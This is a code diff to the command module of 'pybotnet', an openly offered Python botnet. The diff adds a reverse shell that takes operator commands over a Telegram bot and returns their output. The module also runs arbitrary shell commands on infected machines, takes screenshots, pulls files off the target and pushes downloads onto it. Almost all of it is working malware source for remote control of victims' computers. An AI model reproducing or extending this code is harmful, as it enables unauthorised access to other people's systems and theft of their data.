@@ -2,8 +2,8 @@
 import re
 import os
 import subprocess
-
-from logging import exception
+import requests
+from typing import List
 from time import sleep
 
 from uuid import getnode as get_system_mac_addres
@@ -12,21 +12,33 @@ from requests import get
 # pybotnet import
 from . import util
 from . import settings
-mac_addres = str(get_system_mac_addres())
+import configs
+
+MAC_ADDRES = str(get_system_mac_addres())
 
 scripts_name = {
-    mac_addres: "<system mac_addres> <command>",
-    "do_sleep": "do_sleep <scconds> <message>",
-    "get_info": "get_info",
-    "cmd": "cmd <command>",
-    "ls": "ls <route>",
-    "export_file": "export_file <download link>",
-    "import_file": "import_file <file route>",
-    "screenshot":  "screenshot",
-    "help": "help"
-}
+    MAC_ADDRES: "`<system MAC_ADDRES> <command>`: run command on one target",
 
-# "import_file": "import_file <route>"
+    "do_sleep": "`do_sleep <scconds> <message>`: print message and sleep",
+
+    "get_info": "`get_info`: get target info",
+
+    "info": "`info`: run `get_info` command!",
+
+    "cmd": "`cmd <command>`: run command in target terminal",
+
+    "export_file": "`export_file <download link>`: target donwload this file and save to script path",
+
+    "import_file": "`import_file <file route>`: get a file from target system",
+
+    "screenshot":  "`screenshot`: Takes a screenshot, return the download link",
+
+    "help": "`help`: send this message",
+
+    "/start": "`/start`: run `help` command!",
+
+    "reverse_shell": "start reverse shell on target system"
+}
 
 
 def split_command(command: str) -> list:
@@ -46,21 +58,66 @@ def is_command(command) -> bool:
     return False
 
 
-def execute_scripts(command: str, pybotnet_up_time, is_shell: bool, logger):
+def reverse_shell(is_shell, ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger):
+    ''' start reverse shell on target system and send response in telegram bot '''
+
+    def send_message(text: str):
+        util.send_message_by_third_party_proxy(
+            text, TELEGRAM_TOKEN=TELEGRAM_TOKEN,
+            ADMIN_CHAT_ID=ADMIN_CHAT_ID, logger=logger)
+
+    logger.info("start reverse shell")
+    repeat = 0
+    time_out = 500
+
+    while True:
+        if repeat > time_out:
+            break
+
+        pwd = f"{os.getcwd()}=>"
+
+        message_one = util.get_last_admin_command_by_third_party_proxy(
+            ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
+
+        if not message_one:
+            if repeat == 0:
+                send_message(pwd)
+            sleep(2)
+            repeat += 1
+            continue
+        else:
+            if message_one == "exit":
+                out_put = "reverse shell exit."
+                send_message(out_put)
+                break
+            else:
+                out_put = execute_cmd(
+                    command=message_one, is_shell=is_shell, logger=logger)
+            send_message(out_put)
+            repeat = 0
+    logger.info("reverse shell exit.")
+    return "reverse shell exit."
+
+
+def execute_scripts(command: str, pybotnet_up_time: int, is_shell: bool, ADMIN_CHAT_ID: str,
+                    TELEGRAM_TOKEN: str, previous_update_id: List[int], logger):
     command_name = get_command_name(command)
     try:
         if is_command(command):
 
-            if command_name == mac_addres:
-                '''run command just in this system'''
+            if command_name == MAC_ADDRES:
+                '''run command just on this system'''
                 logger.info('delete mac addres and run command ')
                 new_command = ' '.join(split_command(command)[1:])
-                return execute_scripts(new_command, pybotnet_up_time, logger)
+                return execute_scripts(
+                    new_command, pybotnet_up_time, is_shell,
+                    ADMIN_CHAT_ID, TELEGRAM_TOKEN,
+                    previous_update_id, logger)
 
             elif command_name == 'do_sleep':
                 return execute_do_sleep(command, logger)
 
-            elif command_name == 'get_info':
+            elif command_name in ['get_info', 'info']:
                 return get_info(pybotnet_up_time, logger)
 
             elif command_name == 'cmd':
@@ -69,6 +126,9 @@ def execute_scripts(command: str, pybotnet_up_time, is_shell: bool, logger):
             elif command_name == 'ls':
                 return execute_ls(command, logger)
 
+            elif command_name == 'cd':
+                return execute_cd(command, logger)
+
             elif command_name == 'export_file':
                 return execute_download_manager(command, logger)
 
@@ -77,13 +137,17 @@ def execute_scripts(command: str, pybotnet_up_time, is_shell: bool, logger):
 
             elif command_name == 'screenshot':
                 return screenshot(logger)
-            elif command_name == 'help':
+
+            elif command_name in ['help', '/start']:
                 return command_help(logger)
 
+            elif command_name in ['reverse_shell']:
+                return reverse_shell(is_shell, ADMIN_CHAT_ID, TELEGRAM_TOKEN, previous_update_id, logger)
+
         logger.error('execute_scripts invalid command; Wrong format')
         return f"execute_scripts invalid command; Wrong format \n\n scripts name:\n {','.join(scripts_name)}"
 
-    except exception as error:
+    except Exception as error:
         return f'execute_scripts error: {error}'
 
 
@@ -103,7 +167,7 @@ def execute_do_sleep(command, logger):
     except OverflowError as error_name:
         logger.error(f'do_sleep {error_name}')
 
-    except exception as error:
+    except Exception as error:
         logger.error(
             f'execute_do_sleep invalid command; Wrong format, error: {error}')
         return f'execute_do_sleep invalid command; Wrong format, error: {error}'
@@ -126,37 +190,55 @@ def get_info(pybotnet_up_time, logger):
     return util.get_full_system_info(pybotnet_up_time)
 
 
-def execute_cmd(command, is_shell: bool, logger) -> str:
+def ls(route: str) -> str:
     try:
-        command = split_command(command)
-        # command = ' '.join(command[1:])
-        command = command[1:]
+        return "\n".join(os.listdir(route))
 
-    except exception as error:
-        return f'execute_cmd invalid command; Wrong format: {error}'
+    except FileNotFoundError as error:
+        return f'ls {error}'
+    except Exception as error:
+        return f'ls Unknown error: {error}'
+
+
+def execute_ls(command, logger) -> str:
+    command = split_command(command)
+
+    logger.info(f'execute ls: {command}')
 
     try:
-        return cmd(command, is_shell, logger=logger)
-
-    except OverflowError as error:
-        return f'cmd {error}'
-    except exception as error:
-        return f'cmd error: {error}'
+        if len(command) >= 2:
+            path = command[1]
+        else:
+            path = '.'
+        return ls(path)
+    except Exception as error:
+        return f'execute_ls error: {error} '
 
 
-# def cmd(command: list, is_shell: bool,  logger) -> str:
-#     '''command sample: makedir newfolder'''
-#     # TODO: add timeout
+def cd(path: str) -> str:
+    try:
+        os.chdir(path)
+        return f'move to: {os.getcwd()}'
 
-#     logger.info(f'try to run: {command}')
+    except FileNotFoundError as error:
+        return f'cd {error}'
+    except Exception as error:
+        return f'cd Unknown error: {error}'
 
-#     output = subprocess.run(command, shell=True, capture_output=True)
 
-    # output = str(output).replace('\\r\\n', '\n')  # cleaning data
-    # output = str(output).replace('\\n', '\n')
-#     output = str(output).replace("b'", '')
-    # output = output[2:]  # remove b'
-#     return output
+def execute_cd(command, logger) -> str:
+    command = split_command(command)
+
+    logger.info(f'execute cd: {command}')
+    try:
+        if len(command) >= 2:
+            path = command[1]
+        else:
+            path = ' '
+        return cd(path)
+    except Exception as error:
+        return f'execute_ls error: {error} '
+
 
 def clean_shell_data(output):
     output = str(output).replace('\\r\\n', '\n')  # cleaning data
@@ -166,58 +248,49 @@ def clean_shell_data(output):
 
 
 def cmd(command: list, is_shell: bool, logger):
-    '''if you compile app on noconsloe mod make is_shell False'''
+    '''run code on terminal'''
+
+    if command[0] == 'ls':
+        logger.info('redirect to execute_ls')
+        return execute_ls(" ".join(command), logger)
+
+    elif command[0] == 'cd':
+        logger.info('redirect to execute_cd')
+        return execute_cd(" ".join(command), logger)
 
     logger.info(f'try to run: {command}')
 
-    outputFileName = 'data.txt'
-
-    if not is_shell:
-
+    if not is_shell or command[0] in ['mkdir', 'touch', 'rm', 'rmdir']:
         os_result = os.system(' '.join(command))
-        return f'''output code {os_result} \n\nyou compile app noconsole (is_shell = False), That\'s why I can\'t get the output text by `cmd` command
-        (for get directory list use `ls` command, like : `ls /home`)'''
+        add_on_message = ''
+        if not is_shell:
+            add_on_message = '''\n
+you compile app noconsole (is_shell = False)
+That\'s why I can\'t get the output text by `cmd` command'''
 
-        # # this a bug (if compile code on noconsole i can get stdout ..):
-        # with open(outputFileName, "w") as outputFile:
-        #     result = subprocess.call(
-        #         command, shell=True, stdout=outputFile, stderr=subprocess.STDOUT)
-
-        # with open(outputFileName, "r") as outputFile:
-        #     file_data = outputFile.readlines()
-        #     result = f'{file_data} \n\nreturn code {result}'
-        #     outputFile.close()
-        # os.remove(outputFileName)
-        # return clean_shell_data(result)
+        return f'output code "{os_result}", {add_on_message}'
 
     else:
-        proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
-                                stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
-        proc.stdin.close()
-        proc.wait()
-        result = f'{proc.stdout.read()}\n\nreturn code {proc.returncode}'
+        result = subprocess.getoutput(' '.join(command))
         return clean_shell_data(result)
 
 
-def execute_ls(command, logger) -> str:
-    command = split_command(command)
+def execute_cmd(command: str, is_shell: bool, logger) -> str:
+    try:
+        command = split_command(command)
+        if command[0] == 'cmd':
+            command = command[1:]
 
-    logger.info(f'execute ls: {command}')
+    except Exception as error:
+        return f'execute_cmd invalid command; Wrong format: {error}'
 
     try:
-        return ls(command[1])
-    except exception as error:
-        return f'execute_ls error: {error} '
+        return cmd(command, is_shell, logger=logger)
 
-
-def ls(route: str) -> str:
-    try:
-        return os.listdir(route)
-
-    except FileNotFoundError as error:
-        return f'ls {error}'
-    except exception as error:
-        return f'ls Unknown error: {error}'
+    except OverflowError as error:
+        return f'cmd {error}'
+    except Exception as error:
+        return f'cmd error: {error}'
 
 
 def execute_download_manager(command: str, logger):
@@ -242,7 +315,7 @@ def execute_download_manager(command: str, logger):
             f'execute_download_manager wrong format ;need download link for execute_download_manager; error:{error}')
         return f'i need download link for execute_download_manager; error:{error}'
 
-    except exception as error:
+    except Exception as error:
         logger.info(
             f'execute_download_manager; error:{error}')
         return f'execute_download_manager error:{error}'
@@ -339,21 +412,20 @@ def command_help(logger):
     commands = ''
     try:
         for _, value in scripts_name.items():
-            commands += '\n|' + value
+            commands += '\n\n|' + value
         logger.info(f'scripts.command_help: return command lists')
-        return f'''
-
+        return f'''command list:
 {commands}
 
-Pybotnet Version:{settings.pybotnet_version}
-for more help, see: {settings.pybotnet_github_link}'''
+Version: {settings.pybotnet_version}
+more help: {settings.pybotnet_github_link}'''
 
     except Exception as error:
         logger(f'scripts.command_help: error {error}')
         return f'''
-Pybotnet Version:{settings.pybotnet_version}
 _____________
 get command list failed!,
 _____________
 
+Pybotnet Version:{settings.pybotnet_version}
 for more help, see: {settings.pybotnet_github_link}'''
